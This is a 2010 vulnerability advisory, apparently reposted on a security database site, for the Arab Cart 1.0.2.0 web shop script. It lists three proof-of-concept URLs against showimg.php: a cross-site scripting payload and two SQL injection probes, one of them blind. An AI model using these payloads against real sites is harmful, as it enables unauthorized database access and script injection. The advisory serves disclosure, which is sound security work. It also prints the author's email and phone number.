Arab Cart Version 1.0.2.0 Mullti Vulnerability

2010-03-02 / 2010-03-03
Credit: indoushka
Risk: High
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

======================================================================================== | # Title : Arab Cart Version 1.0.2.0 Mullti Vulnerability | # Author : indoushka | # email : indoushka@dgsn.dz | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : http://sourceforge.net/projects/arab-cart/ | # Script : Copyright ArabCART &#169; .2010 | # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | # Bug : Mullti | ====================== Exploit By indoushka ================================= # Exploit : 1- XSS http://127.0.0.1/arabCart/showimg.php?id=<img+src=http://127.0.0.1/acrobat.gif+onload=alert(213771818860)>&sid=8207c6aca4d21740c20f51527ccb3f7a 2- SQL injection http://127.0.0.1/arabCart/showimg.php?id=%00' 3- Blind SQL/XPath injection http://127.0.0.1/arabCart/showimg.php?id=8+and+31337-31337=0+--+ Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ========================================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend :

References:

http://www.vupen.com/english/advisories/2010/0443
http://www.exploit-db.com/exploits/11524
http://packetstormsecurity.org/1002-exploits/arabcart-sqlxss.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top